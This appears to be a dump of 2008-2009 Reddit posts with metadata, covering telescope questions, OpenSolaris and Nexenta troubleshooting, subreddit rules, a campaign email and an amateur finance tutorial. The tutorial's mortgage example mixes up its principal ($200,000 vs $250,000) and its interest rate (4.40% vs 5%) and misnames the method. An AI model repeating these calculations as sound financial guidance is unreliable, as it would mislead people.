stringlengths 1
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values | communityName
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Who cares about circumference. I want to calculate the volume of the universe. | r/astro | comment | r/astro | 2008-11-10 | Z0FBQUFBQm5LN1VwSTE4aVlnX0FGdmpIeGRKQ0R5VDVjWmpzN05DX2VPU0ZYQ1VRb2Z3RkhUQmtacFJuejg3ZVRkNDRITTJLZXVlLXJUWDJxYXM5a1JmQUg0bGUwMEZCN2c9PQ== | Z0FBQUFBQm5LN1Zob0NSV00tWUFZb0dEUnJGbnpzdDJaNHRnemFHMFJCM2czT2pKb0dBV3FReUpEZ3MxYmpGNzdJbzlUaE1OTlM2RWswN2NSRFJGY21QRThtMnN4NmJwX3dDbWRZWDY2T1BaNmVHSVRRQ1VWWVVrX0dHMmFFNEhHM1FHWW9Ub1ktZ1NzQ2ZHc1d2Y3BFaGtDekNoQW9LRVVwTi1oQXloYi10MnpsejlWSUMyMm55bkZLeXF2QmxfeGdwZThjeGRVNkxQQ1ZXTnJrSTRFcEFERnQxUFg3SDFyUT09 |
It's pretty sad that "obvioustroll" has the top two stories in astro right now. | r/astro | post | r/astro | 2009-06-25 | Z0FBQUFBQm5LN1VxU2Rza0dtd3prby0wblNnUGxvMk5paHExWjlJaXBUZkxaOHF4MkhUWTZJZVdIdGJEcFJkeGx4ME5oeFVrNkt4a2lVYkE1SnU0WG9VcEhsMjBTN28wZ1E9PQ== | Z0FBQUFBQm5LN1ZoU3F3dmF6OXNVMlJFN3E0NDloUWhGRXVrV21KakFsR3A4Q1lqRm5Pd3pKdXFGWlU5SGE2MWNfQVl5RFZoODNMaHNjR0h0eTI5RHpkdnIwdGpIZVpIS1NPMUh5SDY3UEViWjZyektsSEVneDVKTllQU3BBR0gyLThpcW5zUERTX1pHanV3RnZuNkt6akE4c3J4OFZoWDE2MTE3b054VUFlclowMjRHU2podGMtLUxRVXh3aEdrcXZfOXRmenQydjBX |
So I just got an Orion SkyQuest XT10. I heard that in order to see the LCROSS lunar impact on October 9th, you'll need at least a 10 inch telescope, so I'm pretty excited. My question is, does anyone have any estimates as to what magnification will be needed to see it? I heard that the crater will be about 5 miles wide, so I'd imagine it wouldn't have to be *too* powerful. I've got the 25mm eyepiece coming with the scope (48x) plus a 3x barlow. I'm wondering if this will be enough or if I should get a stronger one. Thanks! | r/astro | post | r/astro | 2009-06-27 | Z0FBQUFBQm5LN1VxUzhDbXNTdGtCWGtqNGw3ekFIemxUWkNNUjVFVGVlTjBOOTRIN1VLU3FpNmpGNFNyUVY1XzNlUWdNRjBkRldzMnVNdzBXSFZMZ2w4N3V5Y052UXR4alE9PQ== | Z0FBQUFBQm5LN1ZocjQzLUhsOEUtUGVkWkd0ZVdkN25HOU5BNWpJdmxqZ09JS0o5NEc1S3R5T3htZzRhaWI2ZDhIRGdEdkQydW9uRnNfWXBremQtM3BsVGdTVmE3NTI4T0MwTUlLZFc3V1lTQkNqOGRiWklLSmRFZ0sxdzF6WHBqcVk2QmswYm45VTJzNjcwZmU5VGpiVFFqMUxLbl8tUGdRcHUwNGE2Q3hCemZSMzM1UGo3NVdrdGZ4V3JyTWY5TVBzZ0J1dGdJQ19i |
Hey guys, since it turns out imgur has already taken down two logos (possibly due to reddit's legal team? i dunno.), I have some suggestions for how to handle this and other cases of dead links. And since there are a few other (perhaps already obvious) rules that /r/logo has or should have, I thought I'd make a (really short) list.
* 1) If you submit, keep the formatting we're already using, which is (YYYY-MM-DD) Explaination of Logo
* 2) Link back in a comment to the logo-inciting Comment/Story if applicable.
* 3) If the link goes down, I'd think the last thing we need is lots of dupes. This should be a clear and concise list, so in this particular situation don't start voting something down just for that. Instead, post a mirror in the comments. There's already a lot of reddit logos [here](http://pineapplecharm.com/reddit/), so that'd be a good place to start looking if the logo link is down.
EDIT: kn0thing just posted that any logo from now on should be able to be found on S3 in this format: http://s3.amazonaws.com/sp.reddit.com/redditYYYY_MM_DD.png So that's the new source.
That's it. Hope this helps, and is warranted.
EDIT THE 2ND: These rules can now be found on the right side of the subreddit. | r/logo | post | r/logo | 2009-06-28 | Z0FBQUFBQm5LN1VxeE5aOUZGalNKcUgyakhvQkpQYl9KRnNraTByYXNIZVQ0OEk3bXF6M3RJN1lkTWRab0h2cEY0LVgxYzdCdWNZNGJTOThnajJrcWtGMEh5Y1p4M3I3RkE9PQ== | Z0FBQUFBQm5LN1ZoV2RmUVNxQzRaaG41X1dISzZQZ3Q3NkVTTjhOLS1TRlJ3cm9abG16ZjJDMUtMWTk4Y0ZLZTI0b1djRTVWT3FKT3NZZWt2bzVPSEQyTUxrOF9GUUlhSm9fQXl4Uk5McllMZi1JNHU1S1FZejhtMV8tbk10bHJYaU5sRDdTVkE4VUZMd1RsWjA1Qmo3UFdHX3kzaXVxMWhKR2pUVlNMVUI5Yk5ySlotemJ3QnhRPQ== |
After kn0thing's post I made a quick perl script to look for every day. I'm too lazy to make a post for each one so here's the list:
| r/logo | post | r/logo | 2009-06-29 | Z0FBQUFBQm5LN1VxY2Z1REpfV2hBQVlHcVF2WUI4VlJjMkpuWHFuRW1oQ0kzRlN0cllyb2NtMTMxRlFGNnFGNWJLZWxva1lxZHkyWDRtQ2FJNExHVEFhMUVwSUgtamdSbnc9PQ== | Z0FBQUFBQm5LN1ZoaThmaDJlblZaTlFMcFJYWDdROXp5MWNMdUppZG5yc0xRZWNvdUJidWdpZGVIUHp0WDIzblJNT25RemZHZ0ZRUDhkdEdaYmJHNHNtcnpINlhGZ19WU0UtcndVb2d0MHgyZlBaZ0R0MEZXLWpkWHNFQ2wwalFRcTZWZWRIcFd5N3AyWjNxYS1WRjVkSlByV0RjemZaa3VqUWt0eUxxZnhYelJMNHcyNk1QZUxvejZpakVlWkhkLWJTWTRwdVVsYVVu |
I love textsfromlastnight, FML, Awkward Family Photos, Mostly Drunk Texts, and STFU, Marrieds.
Any other cool ones you guys know about? | r/schadenfreude | post | r/schadenfreude | 2009-07-27 | Z0FBQUFBQm5LN1VxUzV6RnZreXVwTjlqVVRjcHU0YWlHdTFBc3pKRzgwWGFqbmFOVy1vMi1NLVEyM1pfWXpva01SR3dKeUdkVjJKQXlMdEtma3RhM3hJT0Z4b3pUQ3puZ3c9PQ== | Z0FBQUFBQm5LN1ZoSWd2RUJfTU5sdlBtalo2TVpKaTFEYzk1RTB2eXM4QXBENHNiX3JjcW5pVC1SVTlySmlWRVJIZjRqU2FzQVpoLV9CXy1SRHByS0duSm9JTzE4N1huQXpoSUt3bGdsNU02bVd2WE5ob1dOQ1ZMOFlyZlpNTUx0RllZQWJkWmpoTTZCNzZZdWxfbWtpMDVDV2s4eGhnY2ZQR2Z6V2VOeVhIU1E5b2J6SThfbjZaLTV3ZlU4M2k0MHdOc1FuYkFkdlhYb1M1LUt1Z3NaS2xucXpmQl9VVUo0dz09 |
Okay, so as an Ubuntu user, I figured a Nexenta install would let me enjoy the niceties of Solaris without having to re-learn a whole lot. Plus I like apt. Now, maybe it's just my system, but this is the following shitstorm I've had to deal with:
1. **zoneadm clone** doesn't actually clone, it copies. This is regardless of what zfs-mounting hack I use or variable I try to export after Googlin'.
2. **zoneadm clone** doesn't even fucking copy, it crashes trying due to a broken program.
3. **zoneadm detach** doesn't work right, calls attach instead half the time.
4. **zoneadm attach** doesn't fucking work, period. Runs out of memory on a system with 4 gigs of RAM.
5. In a Nexenta Zone, installing via apt-get is broken. It calls rc.local, which hangs, meaning it can't finish the installation of apache or postgreSQL unless you remove references to rc.local from the post-install script and re-run apt.
6. Actually cloning a zone consists of the following:
* Make a new ZFS filesystem (say, mainpool/DeleteMe)
* Mount it where you actually want it (say, /export/DevZone)
* Set it up and install the Zone, then boot to test.
* Halt the zone and Unmount the soon-to-be-deleted filesystem.
* ZFS clone the actually zone you want to clone. Mount it to the same spot.
* Boot your newly working cloned zone.
I'm not sure if ZFS makes this easier or harder, but can I just install _real_ Open Solaris to a new ZFS filesystem and have that boot instead of my current Nexenta setup, then attach all my Zones once I get there? Nexenta has _too much broken shit_ at this point to be worth the hassle. I'll fucking _learn_ Solaris's packaging system.
I beg anyone who knows how to do this for help. I'm so sorry for not knowing better >_< | r/solaris | post | r/solaris | 2009-07-29 | Z0FBQUFBQm5LN1VxZktzRTRLRnBWSHloUDVuZWJLVUpZa2psNGR2ZEk5S3k5cXUweThXT0ZBNXdzRkU4cTFNU01sVDJ3blJKUVRySWtnQ1pTYTNCSE5fNW5WUHZMX1FaSnc9PQ== | Z0FBQUFBQm5LN1Zoc3Jjd1hsS21lT0RKRGpibEJQWXFEcDE1YWhtMFhnSHh0a243Tl8zTlNMQlFrZHlOT3VRQ0tLRlAxNy1vT0J2RVo2OGlHcC1pYU1Odmw1VDJVdlpJNDVMVTc5anhfY1VBSzNJdUFrTGI4eFJLNTY1QldpUU1zMG1KR3JJQ1JaaWFiU29wU3FXR2c1VmpmLTVrd2FsRm1JMFVsbHVkZ2FVMS1uUzA2czQ0NFhpaUwyVnBvdGFRTjhXclQ4QWhyaEs0 |
See [here](http://www.reddit.com/r/Austin/comments/99imi/raustin_logo/c0bwv0k) for what we have in mind. Could someone possibly slap something together? Austin would definitely appreciate it. :) | r/logo | post | r/logo | 2009-08-12 | Z0FBQUFBQm5LN1VxOTV2V3pfcHhXZWJvU2N3X25uUE9hNXhRSENZdTNsYXl0ZFc5a2VNdllNa1NlNFNfRno1Y1FFUHFFLUpyLWVvTVdRU2Ntemt5bmlINzhfYTB1cE4yWnc9PQ== | Z0FBQUFBQm5LN1ZoZzhPZmtpNEFoVEVRU1J0dzJ6TG5DYURsbFJOZUI3YmR5UTYxZFNPdUFUeWJ3bmN0MDJhdFphWUNBVkFrcXpOeGZpU3pKNElGWkY5c2d2SnFjZEZqOFd3OHBNOWl1RFdObkc3SzBRZ2hETEJzVnlJT1VZTUYzYnVLc2V6MXFSM2tub2c4akJOb3BwaFJkbUdYMVVkUjB0MDNlaF9FWDdNWFkzYlZjOUEzYnFqTF9mWVI4aE1HMWxFZ0w4dndEc1VP |
I get
Unable to connect
Firefox can't establish a connection to the server at www.demonoid.com.
* The site could be temporarily unavailable or too busy. Try again in a few
* If you are unable to load any pages, check your computer's network
* If your computer or network is protected by a firewall or proxy, make sure
that Firefox is permitted to access the Web.
Even with my firewall turned off I cannot connect to it, Any help? | r/demonoid | post | r/Demonoid | 2009-08-28 | Z0FBQUFBQm5LN1VxSUdBS2tWdFE0MzcwTjNsandBZEZmVVpTc2p3cWR2TmNWVzV1WDg4MDlrMGlKSWJHOWM0TzlsaGoxY3dJek1BeU03bXQ0NnZoQ0FHOVVTYWNUZ1VnN2c9PQ== | Z0FBQUFBQm5LN1ZoNVJGX2FOM09IYjNkaFBHWEJLd2xMcFNYeFNjeWdWanFHUDEzRHYtNXgwNjRycmIweTlwRHBuQlJhbkZZYVRwaUhKUnI5QnRHT0RhTExnMkZjOWZ3WGdfYkx1NWE5bTE1NTBQMEU3bFRvMmhtVnFsbnRoSFVwc3k4aXUwZXVkZERpY0FtdlhFWG1Cc3I0ckJzMXk3MDNpUnQtUDNGa3F3ZnBuQ1BKYkpuYzYwVnhCbV91Sk5lc19qVnVMMHpvWFpQb3hUandFaE9hWHI1R3U4MkR2c1NUUT09 |
Joan C. Nordbotten - Elementary information retrieval in frames for your "conveniance"
edit: added link
| r/csbooks | post | r/csbooks | 2009-09-08 | Z0FBQUFBQm5LN1VxTmF1Q1c0c2ZlZkx3QURKQVFZVUZLcFdScEhxWVF4MEduRTJObnQ4eVhNSVgzNzI1cThiVS1lVmU1QjNOTTFKaEJyVThyeWRsRVlWRE5iRDBQeEhLREE9PQ== | Z0FBQUFBQm5LN1ZoZTJDWVlkdnpibUF3bmF0XzB0cUxTV2h2SEdDczRkaEFYNWsxWnhDWkJlNGdjNWhCa185dmtYcVhYd1dOZ0lOTnkxTFV4QW83MGpnWk1mamE1MV92NlpVd3FucVk0Y1NlaWxKT0VqVEZtSjlhREgzZjFHRm9McWh3Zk41ZUg5dk1QODliU3dfcnUtTzQ0YlJ2SzJMMGtfNlZyMmx1VVpTd2NYZWtWeHBuZ01VdEFoc0RvLS11YUw0NnpnQ1FTcGxw |
Just recieved this email:
"Dear Friend,
Well, it looks like you have made a difference.
Based upon the unbelievable support that I have receieved from 10,000 supporters like you, I have decided to throw my hat into the ring to challenge Chris Dodd for the honor of representing the state of Connecticut in the United States Senate. I will announce my candidacy on MSNBC's Morning Joe show on Thursday, September 17 at 8:15am eastern time. Sorry for the short notice, but its important to honor commitments and keep these things under raps until the day the news breaks.
At this time last year I could not have imagined that that I would be making such an announcement today. I had never intended to become a candidate for public office. But these are extraordinary times. Our economy is falling apart in front of our eyes and Washington seems intent on making the wheels come off even faster. At a time when we desperately need adult supervison, the economically illiterate are running the show. As I love my country, it now seems clear that I must try to do something to help. The emotional and material support I have received from across the country has made the decision much easier.
So today it begins. As I'm sure you are aware, the rules in politics bear only scant resemblance to those which govern polite society. As a result, I am wading into strange waters, and I'm sure strange things will happen. But I promise to maintain my composure and give it my best shot. Based on the support that I have received thus far, I fully expect to be facing down Chris Dodd in the general election just 14 months from now.
As my campaign takes flight, I appreciate the patience and trust that you have shown. To commit time and money to a long shot candidate for high office is a hard choice. I hope to repay that trust with a first class campaign.
I look forward to your feedback and your continued support.
Thanks again,
Peter Schiff" | r/peterschiff | post | r/PeterSchiff | 2009-09-17 | Z0FBQUFBQm5LN1VxSkIyaUlXcEJ3d2k5ZFY4Nnp4NUNaTzhPUTZiOC1mYkw3SV9nbWVUUTUtUG1UMUxpclp0djZaYUhYSnJ1cXpCaU1RcG5MT0VNdVdFbnpQQmFFcUtEaEE9PQ== | Z0FBQUFBQm5LN1ZoZWhPd3NVdXdEUWEwLU9JVTRyelNvTVU2VGMzQk9YUjRuTFRVcFZZWnpOZm04VWtMbU5lQ0FFQkdjcm00OEhhQ2NSZU5FclJqNUhjb2t6NVZNWjBhMWMzQmV1eWxpY0t3TjJvOXhSb0EteERWRTJGTE5aUTNrTW9jTmFaeWxmWUJhVVlxR2haWExBTm84cTd1dmluR18xemFudkNDWHc3SGthTjBkZzdLQThQcWxUR1dyUkhHeU9vMzFGM3B2Yk9qeW9Pbm5vR3gzV09QbnRza1lzdWVvQT09 |
Thank you | r/fringescience | post | r/fringescience | 2009-09-18 | Z0FBQUFBQm5LN1VxX2dFS2pKTkhVSU5iNUd1clFxUTJic3dlVHBzek85SG1PWXVfSDhmWk9tY09DbGVncTM0bU9mQVpBTWdhSVFMOTJLdURFY0lWTXdrU3VlbXNJOTVEdHc9PQ== | Z0FBQUFBQm5LN1ZoNURVc3VOQ3h2ZzRuaWpnV0RFOGVPeTJTOHc4d1Z6cC02VHVDNU9ucERYOHU2eTBjbjN5aTM4ZTBVTGdpSElpZFlVSkNxdFRaMTJ0Qmd2YVBodWpYZlJnWExYUkp3N3cyMTI2cThUSi1tMUhXMVVVMDFHb1FZSkRoUmJkWDhsSE5IUVI3THFDVko1UC1HY1p0V0dMSS1qQnpvQUxSRUd0eWhVUV9nSmJzM09yQlI0MDRDbVFDVHpNTXRIUnM2X3lCNTdyWlk1X2Rwd2JwdG1RZy1Lb25PQT09 |
You know, that guy who talks about a bunch of different things, you know, physics, ancient civilizations, dimensions, consciousness, you know, the structure of vacuum space, fractals, atoms and molecules, you know what I'm saying? 8 hours of "you know, OMG", maybe you just don't remember. You know? | r/fringescience | post | r/fringescience | 2009-09-19 | Z0FBQUFBQm5LN1VxZHdOSWhEanBWQ2FSajFHNC1rX3dldEgxNXFReWpQelVtT0pEMnhkU055T05hTThNUEp4VkhhV0Z1cGNtVGRTcU9KaWtINHFXT0NSLVRRQjd0Q296LXc9PQ== | Z0FBQUFBQm5LN1ZoNTYxb2dGY1FuQ2NpcEpoQXg1TXhsbWk0b3FTV1JQSXdDdjM2N054OGs3UndPcFJ3dnY0dWNBN3FlbTE3SUJHS3hEWVpvakU5Q1hqRFU4WlVUZW9DQkJHS1BOT2kzdUw3bFJLakc3U1EyQzZ0R0Q2ZXVQc3JHMlVDb2sxdUxLRUdPM0I1ZmYzTDF2Qk9UQ3VGcFVTZUFIbTZSY2l4R3RKY0FtUXhrQlpaTDhacmdVVzZPSUU4NmI0emNQRFR4UmEzRWVVWGoxTkprbWlGVFJWZUVqaVV4Zz09 |
I created a small ZFS storage server, and I swear, it's done everything possible to suck as a storage server.
On sending data TO it: As I have the rge driver, given that every NIC under $100 (the price of my mobo and cpu combined) is made by Realtek, I have this annoying bug that kills the network connection every 20-30 gigs of data transfer to the server, whether by SSH, NFS, SMB, or Rsync on any of the above.
Speaking of SMB, aside from how annoying it is to set it "simple" SMB sharing on OpenSolaris, 2009.6 has a bug that kills the SMB server (seriously kills and zombies it, there's no workaround aside from resseting the box as the process refuses to die or restart) if I so much as look at it the wrong way (say, setting up DNS Multicast so that other computers can find it. Accessing it via IP holds steady, but the moment I try its hostname it dies).
All this would be substantially less annoying if I could:
* install a newer dev build via CD
* install newer packages for samba
* upgrade my system to a newer dev build
There's no install CD for a newer snv AFAICT, the packaging system doesn't allow for newer packages beyond snv_111, and my system refuses to upgrade, whether by GUI or command line (using the instructions on the Open Solaris site), each on a _fresh install_. So I'm a little miffed, and the only reason I haven't dropped the whole thing is because ZFS is just _too damn sexy_ to pass up. Errors that would have resulted in a re-install in linux land are a 5-second rollback and a reboot.
But, it's still rather annoying to try getting things working. EXT3 is no good, NTFS is no good for the above mentioned upgrade issues, and the bloody thing didn't even detect **my (50 some odd gig) FAT32 drive**. If it wasn't for rsync I think I would've given up days ago. And I haven't even tried to get the printer networked. Lord help me. Anyhoo, bumps and bruises aside, here's the fix I promised!
Now, whether you're running Nexenta as a zone in Open Solaris or Nexenta itself, [this fix should help you with getting SSH to work properly](http://opensolaris.org/jive/thread.jspa?messageID=419186񦕲).
BIG ASS UPDATE! (as if anyone reads this anymore)
* Network bug fixed via gani driver
* CIFS server still broken, but breaking less often for some reason
* Debian Lenny LX Zone handles FFMPEG and MPD, Nexenta Native Zone handles webserving. OpenSolaris now dedicated to CUPS, CIFS, and NFS.
* Installed SNV_126
* CIFS server fixed, Native zone broken (now waiting for 128, ugh) | r/solaris | post | r/solaris | 2009-09-24 | Z0FBQUFBQm5LN1VxdkZ5RWl2ZklxZy0zNHE2SXlLSnhBeWgtdFZJXy1EVm5NbzFSc0tGOFpjYUEwWkl3OE9UcjVsR0d5dkpnQ0k0ZEZpak50M1lMVHZncUtFMWlnZmJrbEE9PQ== | Z0FBQUFBQm5LN1ZoM3NwOUFBWDUxNmNzem9CcmFZak0yeVM2OF9MNktJRDE2Ql91X2Jsb09zR29zNS0wSG5BOWZBMEhQUVVsZDhRNXhVQUFwWXo3cG56Z21Idmo4MFlLUTEzM2huem5EbGFuVEljZTZVQUtoVFVvZHliWFVnZXpEWnFEem0yc2pCeHBCTkJocGpNY09RaDNfM3Niend2aXRjRkRhT3lfVk16Y0c4SHVVMFY5QWVTX3ZSVWNhRUZDZUdhM2h2bU1qcFA0Q0hqYm1VVUZLVnozeWRyWUp3TUdwZz09 |
I'll upvote it again. I don't care. | r/astro | comment | r/astro | 2009-09-29 | Z0FBQUFBQm5LN1VxaXFFS2loVUg5a29uczJBZllHSVJadlZOMTZLT01LWHlaZ09BS0ROM1k2RjBZV21fVUhlWlFnZVJDZ0ZpX2VKdUhtZllscEp3QThQbTVpY3N3Qmk5aUE9PQ== | Z0FBQUFBQm5LN1ZoVEdLMHowdnhQclRLQlVVaFp4T1ItTVpod25HYm1RRmExdnlSbmtBYkdFbFhZQ3hUbnRNSWl0UURhOW9vSTFyX2hNVDgxejN3X2dRLWd6bVFZNjdsSjA0Y2dXaFNkUExnUTFBb28td1MwS2IwVWVTbTBQU2ZsaHJfOFdNVFJwdzQwYy15ZkM4eTdkLWtjeFhObTM1TUlyQkgtcUh4ajE2Z1gxOGEyV0N0T2dPSlllRGtvQ2x6bndJczlTNlVaYjlTTDBiU1dGOTg5WDVxQmRGMktMc3NKQT09 |
hey all, i am familiar with "traditional" database design and am intrigued by this whole nosql movement and was wondering if there were any use cases "out there" that can help me understand when/where a nosql/kvp structure would be more appropriate than a normalized db approach.
thanks in advance | r/nosql | post | r/nosql | 2009-10-06 | Z0FBQUFBQm5LN1VxamJPU0NsRWVLSDMybmJQRFNMMlZUWlJ1MExtUjRRSnpySjlsaS1MWktod0FIZ1hmYTZiS194S1k5ams1bk03cElSR0NMQTZGYjMxY3VyeFZlb3ZON0E9PQ== | Z0FBQUFBQm5LN1ZodlJaaTFodElyeW1XQU5tMktkNkF0dUZOX1RjVDVheUl6ZWVMalBNaVdhRlRndWpIYXpwWVB1TEZrTGZ6THFlZkg0ZktlQ1k5VzVHWlRMeEd3UmJhN2tETTRNeEFFMnlHc21Sc0luQjhGN2pSbFl2WlF6UUNMdXhOZ2hBR1BjT2sydHFqQTdZWWYxWnlGdnhETHEwRVhzMHZ5bFMwTjJCOFpTZGprLTdEYmpzPQ== |
So I figured it might be good to have an events specific reddit.
The main goals I think will be
1. Find about events others think are cool
2. Find out if others are going and maybe meetup
3. Find others to go with if you don't want to go alone. | r/seattleevents | post | r/SeattleEvents | 2009-10-11 | Z0FBQUFBQm5LN1VxOHJ1cVh6dUxGM3djRjFvN3p1S2xKMG5UM2c0LXYzMUpqYllfVVM0TDY5NGROVTJ0RkVuWDZpRm9Yc21pT1gxYThaTkFVcGx5ZndCbmVDMF9rV0lnOEE9PQ== | Z0FBQUFBQm5LN1ZoSV8xbW9GZDhzODlaTXdSb2NqZlo3bzF5MlJzR0FBUlBIWnlGZy1yeW9rWDRJb1F0QnY2eTl4RFduUFVPY3lZUzAtSkJCeUZ0WmkwNUxneEVSMXVyRkFzYTNvek9MVEItQ0tkclpIVGd3dkR1ZDlwT3FkdVZXcjZJa0h5S0k2YklBUHZRWVN4ZldJdlEwbUJuYUdzRzJRPT0= |
I came here looking for what you'd think because I badly need first-date ideas. Looks like there's nothing but that horrible Bodies exhibit on 5th and Pike, and a couple Jay-Z and Brian McKnight concerts.
Dammit I'm gonna drop the ball with this girl because dinner and a movie is so lame.
Edit: Nope, missed all the art walks too till November. Missed Salmon Days. This blows... | r/seattleevents | post | r/SeattleEvents | 2009-10-16 | Z0FBQUFBQm5LN1VxTS1saG81d1NYajVieWNIY3l2djRHc0tNbTJvcWtOR3VoNmhFYkh1RGM3WnFndnZva0s5REVwbnVkdDhCMlVxSGsxMGlNREw1bXZ5R1BEUG1MdmdCemc9PQ== | Z0FBQUFBQm5LN1ZoTU1YSFZNX2RoN0xVUlgtbzFKMHFXaUROaDBOTE5JSTFGNHZvNG1lM3BDYkdhNFNhazMyVVY0VGRHbWF4b04yb0xZYV9UeXlHR285OElhMzFndlQzbEZ4cUxLcXA0bUREYXNlZFFDM3NRck9pV2JkY2d5cUZ3Qzk0V1V5bnNmaUNMOElpQ2xJbVowZHdka1pxM2JQSDljYlJwY0dfQ1dkTFcwWlFhVVdLSTZqdTdfM2MwRXpPNWxrLTZiMjVIYldERVZwVlgzalhIS1ZnNUMwSUs3UTcyZz09 |
What is money...
People use it everyday, but few can relate to what it really is.
Most people will answer it's a piece of paper used to buy something, at sometimes. But money can be spent using a credit card, so this definition is flawed.
Theorically, money doesn't exist - it's an illusion.**If every business on the earth decided to stop accepting the American Dollars, then every American Dollars you own would be worthless** Understanding the nature of money is critical to understanding returns, inflation and much more.
Money is, simply said, a convenience. It's an opportunity to buy something later. Money can only be used for one thing: buying. You might a computer. You might buy a mutual fund. Even if you keep your money under your bed, **You are in reality buying something - speculating that the cost of life will go down (deflation) and you are better off keeping your money under the bed (for example, you could believe banks will go under and lose your money)**
Now that we understood what money is, we must understand another important concept: the time nature of money. If I give you a number such as "5", it is uni-dimensional. 5 will always be 5, years later. But money is not like that.
**Would you rather have $5 today in $5 in ten years?** Of course, you would prefer it now for a few reasons.
The first is the risk. The cash you have today is certain. You can get it today, and have it in your hands right now. The second is the most important concept of financial mathematics - you can use the money now.
Not being able to use your money for a certain amount of time is the most critical concept of investment. Every time you invest, you renounce to the right to use your money for a certain amount of time.
To compensate for this inconvenience, one earns interests. Instead of using your money to buy something now - food, computer, iPod - you invest it.
So, money has two dimensions: amount, and time. To be exact, whenever money moves from a party to another (i.e. you buy something at the grocery, you buy Apple shares) you create what is called a CASH FLOW. A cash flow is whenever money moves from a party to another.
A cash flow has two dimensions: amount, and time. $5 given to you today is worth less than $5 given to you in two years. But even this has a limit. Would you rather have $5 now, or $500 in 2 months (from a reliable-paying party)?
What allows money to move in time - i.e. $5 now or in two months - is interest. Using interest, you can move a cash flow through time.
If the interest rate is 10%, then $5 today is worth $5 * (1+10%) = $5.50 in a year. Receiving $5 now or $5.50 in a year is the same to you. You should be indifferent to either option. How we came up with the 10% is an entirely different story.
The last important concept of this chapter is the concept of present value. Let's give an example. Let's say you buy a car. You can pay $25,000 now or $1,000 per year forever, starting next year, at an interest rate of 4%. Which option would you choose?
Now that easy. To solve this problem, we need to use Taylor sum. In the first option, you have to pay $25,000 now (a negative cash flow right now), which has a present value of -25,000$. In the second option, you have to pay $1,000 forever.
You will pay $1,000 in a year, $1,000 in two years, $1,000 in three years, etc. If you think too quickly, you might think you're better off paying it all now than taking a debt all your life, but that is not the question for now (we assume people are logical).
The value of the second option is : 1000 * (1/1,04) [actualized by one year at 1,04; check out how I can with it] + 1000 *(1/1,04)^2 [actualized two years] + 1000 * (1/1,04)^3+...
...Until the end of time. This is an infinite, geometrical series, which is solved mathematically by 1000* (1/0,04). If you do the math, the option 2 is worth... $25,000.
It follows that both options - paying $25,000 now or $1,000 per year forever - are equivalent.
An equivalent way to see it would be to see it like this: instead of giving $25,000 to the car dealer, you place it in a bank account paying 4% per year. Each time, you receive $25,000*(0,04) in interest, which you give to the dealer.
This lesson is simple, but critical to understand most bonds and financial products, especially with an infinite horizon. Understanding interest rates can save you a lot of money when shopping.
Later on, we will see the many weaknesses of this model. Why should the 4% be constant forever? What interest rate do we use? What if there are fees (mortgage fees, etc)? What about the risk from both parties
In the preceding example, we have looked at a financial product that was paid forever, called a perpetuity. However, most product have a limited paying period.
Let's take a 25-years mortgage of $200,000. How does the bank calculate your monthly payments?
The solution is extremely simple; this is an annuity for people with no background in finance. An annuity, simply said, is a sum of cash flows with a different time (paid at a different period). The solution is very simple, thanks to geometrical series. You calculate the present value of $200,000 now (obviously 200,000) and the present value of 1$ paid every year for 25 years. Obviously, you will pay more than $1, but that is your unknown in the equation. Everything else is known. Overall, it looks like this:
$250,000 = X * [1- [1/(1+i)]^n]/i
Where X is the monthly payment, i the interest rate (assumed constant) (let's take a 4.40% five years fixed mortgage) and n the number of years (25)
X = $17738.11432
It follows that by paying $17738.11 per year for 25 years, at 5% interest rate, you paid off your mortgage. This option has the same value as paying $250,000 right now.
By the way, this is REALLY how banks calculate your mortgage, except that it's paid monthly (we can convert the annual interest rate to monthly) and that there might be some fees, and that the interest rate will vary **Bonus: how can we calculate new payment if the interest rate changes?** *(ANSWER: You calculate the value of your loan just BEFORE the interest rate change, then the value of the "new" mortgage at the new interest rate, with the period of time remaining)*
Look for interest rate modelling part I for more advanced concepts on this matter.
In this short part, we will look at the majority of products you can invest in. This is no NO WAY an exhaustive list; in fact, if you were millionaire, you could very well "invent" a new product. However the products below resuem 99% of actively traded items.
The most obvious are **stocks**. When you buy a stock, you **buy a share of the company and of its future profits**. At the most simple level, this is exactly what buying a share is. Stockholders own the company and not the opposite. If you have a company and go public, even if you're the CEO, you do not OWN the company anymore (unless you own 50%+1 stock of the company, we will see why later).
Stocks are the instruments you will invest in the most UNLESS you specialized in another field since they are so simple, relatively low-risk and have no expiration value. If your grand-mother had bought 10 coca-cola shares in 1945 and forgotten about it, they would still be valid today.
There is much to be said on shares. One important concept is the concept of **dividend**. Dividends are cash OR stocks that are given to shareholders. Not all stocks pay dividends. The dividends theory is vast and complex and will be checked in Part 3.
Another one is the concept of split / reversal. When a stock splits, your number of shares increases. If you have 10 shares and the company does a 10:1 split, you now own 100, magically! However, this does not increase the value of the as, you guessed it, the stocks will go down 90%. Miller and Modigliani were the first to bring this theory up. The reverse operation is a reverse split; 10 shares become 1. We will see later that stocks usually increase after a split, and decrease after a reverse split, due to market psychology (part 3)
The last concept we will talk about is the buybacks. A company may buyback its shares - or a competitor might buy the company by buying 50% +1 shares (see this like an election; if you own 50% + 1 votes, and there are only 2 options (yes or no) you effectively control every vote and thus the company). Buybacks always increase the value of the stocks UNLESS they are below market value; usually, buybacks will be much above the market value.
One last concept: *if you are certain a company is going up, you buy the stock. But if you think it is going down, what do you do?* You **short** the stock. This concept is very important. By shorting the stock, you BORROW the stock from someone who already holds it and sell it, with the promise of buying it later, preferably at a lower price. With stocks, the maximum you can lose is 100% of your investment; in a bankruptcy. With shorting, there is no limit to what you can lose. If you short the stock at $100 and it goes to $1,000, you just lost $900 per share! Shorting is very dangerous, although very lucrative. The best scenario in a shorting is if the stock reaches 0, where the money you got by selling short the stock is entirely yours.
Stocks really deserve their own chapters; however, this is a rough introduction to the subject.
**Options** There are many times as more options traded as stocks. Options are extremely popular product.
With an option, you buy/sell the right to buy a stock later at a fixed price. A call is the OPTION (not the obligation) to buy Google at $500 at any time by november 22, for example.
Options are very complex. The most-traded options are calls and puts - options to buy at a fixed price, and option to sell at a fixed price. There are two types of calls/puts: european and american. European options can only be exerciced at a fixed date; american options can be exerciced at any time until the fixed date. **AFTER THIS FIXED DATE, THE OPTIONS ARE WORTHLESS**
So far we have checked companies. What if you want to invest in gold, or oil? Since the stock market is electronic, buying the gold and having it kept somewhere is not possible (it is possible through a bank) since stock markets do not have vault. If you want to invest in commodities, you could buy companies that hold a large amount of that commodities, but this is risky, and can cost a lot.
